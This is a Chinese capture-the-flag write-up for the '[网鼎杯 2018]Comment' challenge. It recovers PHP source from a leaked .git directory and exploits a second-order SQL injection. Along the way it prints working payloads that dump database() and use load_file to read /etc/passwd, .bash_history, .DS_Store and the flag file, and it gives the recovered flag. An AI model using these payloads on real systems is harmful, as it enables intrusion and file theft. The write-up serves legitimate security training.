1、打开之后只有一个留言页面,很自然的就想到了二次注入得问题,顺带查看了下源代码信息,并没有什么提示,显示界面如下:

2、那先扫描一下目录,同时随便留言一个测试以下,但是显示需要登录,账户、密码给出了部分提示,但是最后三位密码需要爆破,结果如下:

3、扫描到了.git文件,那就使用githack尝试获取下源码信息,但是显示得源码信息不全,需要恢复,(这里在网上找了下,一直恢复不成功,后面再看),结果如下:

githack下载下来的:

<?php

include "mysql.php";

session_start();

if($_SESSION['login'] != 'yes'){

    header("Location: ./login.php");

    die();

}

if(isset($_GET['do'])){

switch ($_GET['do'])

{

case 'write':

    break;

case 'comment':

    break;

default:

    header("Location: ./index.php");

}

}

else{

    header("Location: ./index.php");

}

?>

完整得源码:

<?php

include "mysql.php";

session_start();

if($_SESSION['login'] != 'yes'){

    header("Location: ./login.php");

    die();

}

if(isset($_GET['do'])){

switch ($_GET['do'])

{

case 'write':

    $category = addslashes($_POST['category']);

    $title = addslashes($_POST['title']);

    $content = addslashes($_POST['content']);

    $sql = "insert into board

            set category = '$category',

                title = '$title',

                content = '$content'";

    $result = mysql_query($sql);

    header("Location: ./index.php");

    break;

case 'comment':

    $bo_id = addslashes($_POST['bo_id']);

    $sql = "select category from board where id='$bo_id'";

    $result = mysql_query($sql);

    $num = mysql_num_rows($result);

    if($num>0){

    $category = mysql_fetch_array($result)['category'];

    $content = addslashes($_POST['content']);

    $sql = "insert into comment

            set category = '$category',

                content = '$content',

                bo_id = '$bo_id'";

    $result = mysql_query($sql);

    }

    header("Location: ./comment.php?id=$bo_id");

    break;

default:

    header("Location: ./index.php");

}

}

else{

    header("Location: ./index.php");

}

?>

4、先随便进行一个发帖,然后提交留言,回显了我们的留言信息,那也就确定了二次注入的回显数据的地方,结果如下:

5、对获得的源代码进行分析,服务端在接受到我们的数据之后进行了转义处理(addslashes),但是数据在存到数据库中时还是存储的我们提交的数据,变化过程:'->\'->',结合代码:

$sql = "insert into board

            set category = '$category',  //category参数可控

                title = '$title',

                content = '$content'";   

$sql = "select category from board where id='$bo_id'";   //直接取用我们可以控制的category参数

$sql = "insert into comment

            set category = '$category',

                content = '$content',

                bo_id = '$bo_id'";

//content参数可控并且会展示其内容,调用了我们可控的category参数,所以这条sql语句中就有两个地方我们可以直接控制

我们留言的内容在(content):

所以我们就需要把我们想看到的信息写入到content中,使其进行展示,加入我们想要获取database()的信息,那我们就应该形成:

$sql = "insert into comment

            set category = '$category',

                content = database(),

                bo_id = '$bo_id'";

这里很明显content参数的单引号去掉了,但是content参数有进行转义,所以导致这一情况的只能是category参数,这里想到了之前做过的一道题:https://www.cnblogs.com/upfine/p/16545379.html,通过转义符使&passwd=成为了搜索的用户名内容(见下图),那这里我们也可以采用这种方式,因此构造我们的category的payload:\,我们的content的payload:,content=database(),#。结果如下:

6、在网上看到了另外一种方式,就是采用/**/来注释掉原来的content内容,其实两种方式原理差不多,一个是采用/**/注释掉content部分的内容,一个是采用\转移单引号,使content内容成为了category的写入内容(这里写入的是comment表,所以并不会影响原来从board获取的category值,写入之后语句中的category还是\,可以看上面图,在一个发帖中同时获取了user和database),网上category的payload:',content=database(),/*,content的payload:*/#。结果如下:

7、然后就进获取表、列,具体的信息等,但是并没有获取flag,那就应该是存放在系统上的一个文件里了,读取下/etc/passwd,这里不要使用\转义,因为payload中存在单引号,使用这种方式时,导致payload语句中的单引号被转移,而无法执行;

所以这里我们就只能使用/**/注释掉content内容的方式了,category的payload:',content=(select(load_file('/etc/passwd'))),/*,content的payload:*/#,读取的/etc/passwd信息如下:

8、www用户的目录是/home/www,读取一下.bash_history文件,查看下用户使用的命令,category的payload:',content=(select(load_file('/home/www/.bash_history'))),/*,content的payload:*/#,发现了.DS_Store文件,结果如下:

.bash_history文件:

9、那就读取下.DS_Store文件,category的payload:',content=(select(load_file('/home/www/.bash_history'))),/*,content的payload:*/#,结果如下(应该是没有读完):

10、那就使用hex编码读取一下,category的payload:',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*,content的payload:*/#,结果如下:

返回内容如下:

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

进行16进制转换(https://www.toolscat.com/decode/hex),结果如下:

最终成功得到flag文件:flag_8946e1ff1ee3e40f.php。

11、读取下flag文件,category的payload:',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*,content的payload:*/#,结果如下:

返回信息如下:

3C3F7068700A0924666C61673D22666C61677B64363335303431392D326336372D343261392D386664352D3538663932653334363631647D223B0A3F3E0A

进行16进制转码,最终成功得到flag:flag{d6350419-2c67-42a9-8fd5-58f92e34661d},结果如下:

[网鼎杯 2018]Comment-1|SQL注入|二次注入的更多相关文章

  1. [网鼎杯 2018]Comment

    [网鼎杯 2018]Comment 又遇到了一道有意思的题目,还是比较综合的,考的跟之前有一道很相像,用的还是二次注入. 因为找不到登陆点的sql注入,所以扫了一下源码,发现是存在git泄露的. [2 ...

  2. [网鼎杯2018]Unfinish-1|SQL注入|二次注入

    1.进入题目之后只有一个登录界面,检查源代码信息并没有发现有用的信息,尝试万能密码登录也不行,结果如下: 2.进行目录扫描,发现了注册界面:register.php,结果如下: 3.那就访问注册界面, ...

  3. [原题复现+审计][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)

    简介  原题复现:  考察知识点:SSRF.反序列化.SQL注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过 ...

  4. 【网鼎杯2018】fakebook

    解题过程: 首先进行目录扫描,发现以下目录: user.php.bak login.php flag.php user.php robots.txt user.php.bak猜测存在源码泄露. 查看源 ...

  5. 刷题 [网鼎杯 2018]Fakebook

    解题思路 首先登陆页面发现是这样的: 查看源码 源码很正常,也没有什么特别的 web目录扫描 我用的是dirmap工具扫描,扫描结果保存在一个txt文件中,结果可知没什么后台. robots.txt ...

  6. 刷题记录:[网鼎杯]Fakebook

    目录 刷题记录:[网鼎杯]Fakebook 一.涉及知识点 1.敏感文件泄露 2.sql注入 二.解题方法 刷题记录:[网鼎杯]Fakebook 题目复现链接:https://buuoj.cn/cha ...

  7. CTF-i春秋网鼎杯第四场部分writeup

    CTF-i春秋网鼎杯第四场部分writeup 因为我们组的比赛是在第四场,所以前两次都是群里扔过来几道题然后做,也不知道什么原因第三场的题目没人发,所以就没做,昨天打了第四场,简直是被虐着打. she ...

  8. CTF-i春秋网鼎杯第二场misc部分writeup

    CTF-i春秋网鼎杯第二场misc部分writeup 套娃 下载下来是六张图片 直接看并没有什么信息 一个一个查看属性 没有找到有用信息 到winhexv里看一下 都是标准的png图片,而且没有fla ...

  9. CTF-i春秋网鼎杯第一场misc部分writeup

    CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...

随机推荐

  1. 【Github】 Github访问不是私密连接问题

    前言 GitHub是一个软件项目的托管平台,是我们经常需要访问的,我原本在学校时候虽然网速比较慢,但是还以能够满足一些代码下载和上传的,在暑假回到家,再去访问的时候就出现了不能访问的问题. 问题描述 ...

  2. Camunda BPM的总体架构介绍

    前言    Camunda是一个基于Java的框架,支持用于工作流和流程自动化的BPMN.用于案例管理的CMMN和用于业务决策管理的DMN.   本篇文章我们仅考虑BPMN流程引擎,先不涉及CMMN和 ...

  3. 基于MybatisPlus代码生成器(2.0新版本)

    一.模块简介 1.功能亮点 实时读取库表结构元数据信息,比如表名.字段名.字段类型.注释等,选中修改后的表,点击一键生成,代码成即可提现出表结构的变化. 单表快速转化restful风格的API接口并对 ...

  4. Java实用类-Enum(枚举)

    1. 历史 ​ 在 JDK 1.5 之前没有枚举类型,那时候一般用接口常量来替代(例如,public static final String male ).JKD1.5之后使用 Java 枚举类型 e ...

  5. TypeScript(5)类、继承、多态

    前言 对于传统的 JavaScript 程序我们会使用函数和基于原型的继承来创建可重用的组件,但对于熟悉使用面向对象方式的程序员使用这些语法就有些棘手,因为他们用的是基于类的继承并且对象是由类构建出来 ...

  6. 你不会用node 操作mysql数据库吗?

    http://static.runoob.com/download/websites.sql这是实例 websites.sql文件1.安装node的mysql服务 npm install mysql ...

  7. SAP Grid control( ALV Grid 列表 自定义 按钮)

    ALV 列表和按钮 效果 源代码 PROGRAM bcalvc_tb_menu_with_def_but. *&&&&&&&&& ...

  8. SAP 实例- 页签tabsrip

    屏幕页签:项目上有一需求,对标准TCODE 一个屏幕增加一个页签.于是做了个例子. 下面屏幕有两个页签. 我们来看一下屏幕结构.100屏幕是主屏幕,101,102是子屏幕,对应页签test1,test ...

  9. 搭建zabbix及报错处理

    搭建ZABBIX服务器准备工作 1.需要服务器是LAMP 或 LNMP 环境 2.主机名和IP要写在HOST文件里 3.iptables 和 selinux 必须关闭 一.先用最简单的方式搭建lamp ...

  10. python小题目练习(八)

    题目:电视剧的收视率排行榜 需求:实现如下图所示需求  代码展示: """Author:mllContent:电视剧的收视率排行榜Date:2020-11-16" ...